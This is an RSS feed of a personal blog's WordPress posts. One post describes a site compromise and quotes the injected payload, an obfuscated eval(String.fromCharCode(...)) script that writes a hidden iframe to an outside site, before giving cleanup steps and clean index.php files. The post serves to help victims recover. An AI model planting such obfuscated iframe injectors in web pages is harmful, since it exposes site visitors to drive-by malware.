<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Crumpled Notebook&#187; wordpress</title>
	<atom:link href="http://crumplednotebook.com/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://crumplednotebook.com</link>
	<description>The crumpled up notes of my life</description>
	<lastBuildDate>Mon, 20 Feb 2012 03:46:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>My WordPress Got Hacked</title>
		<link>http://crumplednotebook.com/wordpress-hacked/</link>
		<comments>http://crumplednotebook.com/wordpress-hacked/#comments</comments>
		<pubDate>Sat, 06 Jun 2009 21:13:47 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[avast]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=1018</guid>
		<description><![CDATA[So I discovered today that some of my WordPress sites had been hacked. It was alerting my anti-virus software, Avast, that I had a virus in the form of an iFrame. They were all ones that had the same FTP login, which I quickly changed once I realized. I&#8217;ve fixed the problem here, and am [...]]]></description>
			<content:encoded><![CDATA[<p>So I discovered today that some of my <a title="WordPress" href="http://www.wordpress.org">WordPress</a> sites had been hacked. It was alerting my anti-virus software, <a title="Avast Home Edition" href="http://avast.com/eng/download-avast-home.html">Avast</a>, that I had a virus in the form of an iFrame. They were all ones that had the same FTP login, which I quickly changed once I realized. I&#8217;ve fixed the problem here, and am not off to fix the other sites. The two files that seem to be hacked are your index.php located in the root of your domain. The other is index.php located in wp-content.</p>
<p>It&#8217;s a javascript string that reads:</p>
<blockquote><p>? php echo &#8216;&lt;script type=&#8221;text/javascript&#8221;&gt;eval(String.fromCharCode(102,117,110,99,116,105,<br />
111,110,32,100,57,56,100,40,41,123,118,97,114,32,115,100,49,55,55,50,61,<br />
49,50,51,43,51,50,52,59,125,118,97,114,32,103,104,103,52,53,61,34,115,<br />
34,59,118,97,114,32,119,61,34,117,112,116,117,108,108,111,103,34,59,<br />
118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,<br />
34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,<br />
114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,<br />
46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,<br />
39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,<br />
53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,<br />
39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,<br />
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,<br />
43,39,114,39,43,39,97,39,43,39,109,101,62,39,41,59,32,102,117,110,<br />
99,116,105,111,110,32,102,57,57,102,40,41,123,118,97,114,32,115,55,<br />
97,56,56,115,61,57,55,43,55,53,59,125,32,118,97,114,32,115,102,<br />
55,115,61,49,50,51))&lt;/script&gt;&#8217;; ?</p></blockquote>
<p>If you&#8217;re having this problem, first change your FTP password, WordPress passwords and anything else that could have been compromised.</p>
<p>FTP into your site and check the content of the above listed to files to make sure they have been indeed infected. If so open them up in a text editor and delete the above script. The entire index.php file in the root should read:</p>
<blockquote><p>&lt;?php<br />
/**<br />
* Front to the WordPress application. This file doesn&#8217;t do anything, but loads<br />
* wp-blog-header.php which does and tells WordPress to load the theme.<br />
*<br />
* @package WordPress<br />
*/</p>
<p>/**<br />
* Tells WordPress to load the WordPress theme and output it.<br />
*<br />
* @var bool<br />
*/<br />
define(&#8216;WP_USE_THEMES&#8217;, true);</p>
<p>/** Loads the WordPress Environment and Template */<br />
require(&#8216;./wp-blog-header.php&#8217;);<br />
?&gt;</p></blockquote>
<p>and the entire index.php file located in wp-content should just read:</p>
<blockquote><p>&lt;?php<br />
// Silence is golden.<br />
?&gt;</p></blockquote>
<p>Make the change and upload them back to the right spot and it should work. If you have questions about this, feel free to leave a comment and I&#8217;ll be glad to help out. This is what fixed my site. It should work on yours if you are having the same problem, but I can&#8217;t guarantee.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordpress-hacked/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Debating in the WordPress community</title>
		<link>http://crumplednotebook.com/debating-in-the-wordpress-community/</link>
		<comments>http://crumplednotebook.com/debating-in-the-wordpress-community/#comments</comments>
		<pubDate>Fri, 05 Jun 2009 14:46:08 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[diythemes]]></category>
		<category><![CDATA[gpl]]></category>
		<category><![CDATA[pomomusings]]></category>
		<category><![CDATA[studiopress]]></category>
		<category><![CDATA[thesis]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=1014</guid>
		<description><![CDATA[There is an interesting discussion going on over at Pomomusings on this blog post Top 10 Reasons to Switch to WordPress. The article itself is a good list of why to switch to WordPress.Â  Make sure to check on the comments though where a debate begins over GPL compliant themes, whether Thesis is GPL compliant [...]]]></description>
			<content:encoded><![CDATA[<p>There is an interesting discussion going on over at Pomomusings on this blog post <a href="http://pomomusings.com/2009/06/04/switch-wordpress-blog/">Top 10 Reasons to Switch to WordPress</a>. The article itself is a good list of why to switch to WordPress.Â  Make sure to check on the comments though where a debate begins over GPL compliant themes, whether Thesis is GPL compliant or not, and whether it&#8217;s good for the WordPress Community. <a title="Matt" href="http://ma.tt">Matt Mullenweg</a> (co-founder of <a title="WordPress" href="http://www.wordpress.org">WordPress</a>), <a title="Copyblogger" href="http://www.copyblogger.com/">Brian Clark</a> (of <a title="DIY Themes" href="http://diythemes.com/">Thesis/DIY Themes</a>), and <a title="Brian Gardner" href="http://www.briangardner.com/">Brian Gardner</a> (<a title="StudioPress" href="http://www.studiopress.com/">StudioPress</a>) all weigh in.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/debating-in-the-wordpress-community/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Just playing</title>
		<link>http://crumplednotebook.com/just-playing/</link>
		<comments>http://crumplednotebook.com/just-playing/#comments</comments>
		<pubDate>Wed, 25 Feb 2009 18:53:00 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[thesis]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/personal/just-playing</guid>
		<description><![CDATA[Excuse me for the next few days maybe. I&#8217;m playing around with Thesis (new theme) so you might see different things as I start to get into it.]]></description>
			<content:encoded><![CDATA[<p>Excuse me for the next few days maybe. I&#8217;m playing around with Thesis (new theme) so you might see different things as I start to get into it.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/just-playing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SF WordCamp 2008 Presentations</title>
		<link>http://crumplednotebook.com/wordcamp-2008-presentations/</link>
		<comments>http://crumplednotebook.com/wordcamp-2008-presentations/#comments</comments>
		<pubDate>Sat, 16 Aug 2008 18:36:50 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[San-Francisco]]></category>
		<category><![CDATA[sf]]></category>
		<category><![CDATA[wordcamp]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=637</guid>
		<description><![CDATA[Presentation links and downloads from SF WordCamp 2008&#8230;updated throughout the day. LOLcats &#38; the Secret of Virality &#8211;Ben Huh Open Source Business Models &#8211;Stephen O&#8217;Grady The Future of Education and WP &#8211;Alan Levine CogDogBlog &#8211;Alan Levine SEO Mistakes (PowerPoint Download) &#8211;Stephan Spencer SEO Title Tag Plugin &#8211;NetConcepts Twelve SEO Mistakes Article &#8211;Stephan Spencer NetConcepts WordPress [...]]]></description>
			<content:encoded><![CDATA[<p>Presentation links and downloads from SF WordCamp 2008&#8230;updated throughout the day.</p>
<p><a href="http://icanlol.com/ichc-wordcamp.pdf">LOLcats &amp; the Secret of Virality</a> &#8211;Ben Huh</p>
<p><a href="http://redmonk.com/public/wordcamp.pdf">Open Source Business Models</a> &#8211;Stephen O&#8217;Grady</p>
<p><a href="http://flickr.com/photos/cogdog/sets/72157606734821164/">The Future of Education and WP</a> &#8211;Alan Levine</p>
<p><a href="http://cogdogblog.com/">CogDogBlog</a> &#8211;Alan Levine</p>
<p><a href="http://www.netconcepts.com/learn/seo-mistakes.ppt">SEO Mistakes</a> (PowerPoint Download) &#8211;Stephan Spencer</p>
<p><a href="http://www.netconcepts.com/seo-title-tag-plugin/">SEO Title Tag Plugin</a> &#8211;NetConcepts</p>
<p><a href="http://searchengineland.com/070823-082758.php">Twelve SEO Mistakes Article</a> &#8211;Stephan Spencer</p>
<p><a href="http://www.netconcepts.com/">NetConcepts</a></p>
<p><a href="http://tantek.com/presentations/2008/08/wordpress-microformats/">WordPress &amp; Microformats: Past, Present, Future</a> &#8211;Tantek Celik</p>
<p><a href="http://www.slideshare.net/apeatling/buddypress-wordcamp-presentation">BuddyPress</a> &#8211;Andy Peatling</p>
<p><a href="http://dev.gigaom.com/">Om Malik</a></p>
<p><a href="http://demo.talkpress.de/crazyhorse/">Crazyhorse Demo</a> &#8211;Liz Danzico &amp; Janes Wells</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordcamp-2008-presentations/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordCamp SF</title>
		<link>http://crumplednotebook.com/wordcamp-sf/</link>
		<comments>http://crumplednotebook.com/wordcamp-sf/#comments</comments>
		<pubDate>Fri, 15 Aug 2008 15:21:36 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[sf]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=634</guid>
		<description><![CDATA[So I&#8217;m heading up to WordCamp tomorrow in SF for the day. It&#8217;s basically a conference for users and developers of WordPress, which is my blogging software. Hopefully I&#8217;ll learn some cool stuff. At the very least, it&#8217;ll be fun hanging out with computer/blogger people and not people who look at me funny when I [...]]]></description>
			<content:encoded><![CDATA[<p>So I&#8217;m heading up to WordCamp tomorrow in SF for the day. It&#8217;s basically a conference for users and developers of <a title="Wordpress" href="http://wordpress.org/">WordPress</a>, which is my blogging software. Hopefully I&#8217;ll learn some cool stuff. At the very least, it&#8217;ll be fun hanging out with computer/blogger people and not people who look at me funny when I talk about WordPress.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordcamp-sf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hello World!</title>
		<link>http://crumplednotebook.com/hello-world/</link>
		<comments>http://crumplednotebook.com/hello-world/#comments</comments>
		<pubDate>Sun, 27 Apr 2008 23:33:45 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[Tech]]></category>
		<category><![CDATA[categories]]></category>
		<category><![CDATA[guy]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=593</guid>
		<description><![CDATA[I&#8217;m back online officially. No big hurrah or anything. I have a few blogs to post up and will try to do start that tonight, but going to Santa Cruz to see Forgetting Sarah Marshall, so we&#8217;ll see how I feel when I get home. On a similarish note, for you inquiring minds, I&#8217;ve been [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m back online officially. No big hurrah or anything. I have a few blogs to post up and will try to do start that tonight, but going to Santa Cruz to see <a title="Forgetting Sarah Marshall" href="http://www.imdb.com/title/tt0800039/" target="_blank">Forgetting Sarah Marshall</a>, so we&#8217;ll see how I feel when I get home.</p>
<p>On a similarish note, for you inquiring minds, I&#8217;ve been seeing this guy named Nathan. We actually dated before. If you are curious, guy #3 here. Wow that was forever ago. Anyway, I stopped blogging about guys here for the most part, but I guess it won&#8217;t hurt too much.</p>
<p>Hm, I see an update for the new wordpress already. It says &#8220;better performance for categories.&#8221; Perhaps that will solve my biggest problem with it. That actually might make it worth coming back and updating tonight.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/hello-world/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hold on tight</title>
		<link>http://crumplednotebook.com/hold-on-tight/</link>
		<comments>http://crumplednotebook.com/hold-on-tight/#comments</comments>
		<pubDate>Mon, 14 Apr 2008 17:04:54 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/2008/04/14/hold-on-tight</guid>
		<description><![CDATA[At some point today I&#8217;m going to break down and upgraded to the new wordpress 2.5 release. Apparently there are plans to make some changes to the write page in the 2.6 release, so as long as I know it going to happen, I think I can deal with it. However, as with most wordpress [...]]]></description>
			<content:encoded><![CDATA[<p>At some point today I&#8217;m going to break down and upgraded to the new wordpress 2.5 release. Apparently there are plans to make some changes to the write page in the 2.6 release, so as long as I know it going to happen, I think I can deal with it.</p>
<p>However, as with most wordpress updates&#8230;something might break, so if it looks strange, bear with me while I fix it. It didn&#8217;t break on this one last time, but majorly messed over tsamonterey, and took forever to fix.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/hold-on-tight/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A new theme coming</title>
		<link>http://crumplednotebook.com/a-new-theme-coming/</link>
		<comments>http://crumplednotebook.com/a-new-theme-coming/#comments</comments>
		<pubDate>Fri, 04 Apr 2008 07:14:43 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/2008/04/03/a-new-theme-coming</guid>
		<description><![CDATA[I think I&#8217;ve found a new theme to work on to update my blog a bit. Although I have 3 other web projects going on as it is, so it may take me a bit to get around to adjusting it to my liking.]]></description>
			<content:encoded><![CDATA[<p>I think I&#8217;ve found a new theme to work on to update my blog a bit. Although I have 3 other web projects going on as it is, so it may take me a bit to get around to adjusting it to my liking.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/a-new-theme-coming/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My official decision</title>
		<link>http://crumplednotebook.com/my-official-decision/</link>
		<comments>http://crumplednotebook.com/my-official-decision/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 03:47:38 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/2008/04/01/my-official-decision</guid>
		<description><![CDATA[After some thought and reading about, I decided not to upgrade to WordPress 2.5 because UI sucks (despite the annoying reminder bar in my admin panel). At least not until they fix the Write Screen, where you make your posts. It&#8217;s completely horrible. Yes, I will have to give up the cool new gallery feature, [...]]]></description>
			<content:encoded><![CDATA[<p>After some thought and reading about, <a href="http://wordpress.org/development/2008/03/wordpress-25-brecker/" title="Wordpress 2.5 sucks">I decided not to upgrade to WordPress 2.5 because UI sucks </a>(despite the annoying reminder bar in my admin panel). At least not until they fix the Write Screen, where you make your posts. It&#8217;s completely horrible. Yes, I will have to give up the cool new gallery feature, but I&#8217;ll survive. So, WordPress, move the categories back to the right column, and don&#8217;t make me click &#8220;add tag&#8221; to add a tag to my post.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/my-official-decision/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.5</title>
		<link>http://crumplednotebook.com/wordpress-25/</link>
		<comments>http://crumplednotebook.com/wordpress-25/#comments</comments>
		<pubDate>Sat, 29 Mar 2008 20:05:56 +0000</pubDate>
		<dc:creator>mfelkins</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[hate]]></category>
		<category><![CDATA[love]]></category>
		<category><![CDATA[oh how i love to hate wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[you are the thorn in my side wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/2008/03/29/wordpress-25</guid>
		<description><![CDATA[The thorn in my side. How many times can one piece of software need updating? Seriously? Just wait and do everything at once. If it&#8217;s critical that is fine, but if you have that many critical security updates a year, then WordPress has bigger problems. So, they just released a new version. I upgraded on [...]]]></description>
			<content:encoded><![CDATA[<p>The thorn in my side. How many times can one piece of software need updating? Seriously? Just wait and do everything at once. If it&#8217;s critical that is fine, but if you have that many critical security updates a year, then WordPress has bigger problems.</p>
<p>So, they just released a new version. I upgraded on a test site, not here because you know how it likes to break my stuff. Anyway, the new design isn&#8217;t bad and it has some good features. However, the reason I will probably put off upgrading for as long as I possibly can (until DreamHost or WordPress start harassing me with little reminders in my dashboard again) is that they moved all the category, post password, status, slug, etc&#8230;BELOW the post. I kind of like not having to scroll down when I&#8217;m writing. I type, click a category and publish. Scrolling is not fun. They should know better. At least give users an option to move it back to the right sidebar which is being used for stuff no one mostly needs there now.</p>
<p>What were you thinking?</p>
<p>But, the new features are cool, especially the gallery thing. <a href="http://wordpress.org/development/2008/03/wordpress-25-rc2/">Check it out here</a>.</p>
<p>If I didn&#8217;t love you so much, I&#8217;d hate you <a href="http://wordpress.org/" title="The Thorn In My Side">WordPress</a>.</p>
<p>P.S. The font is a little small too.</p>
]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordpress-25/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

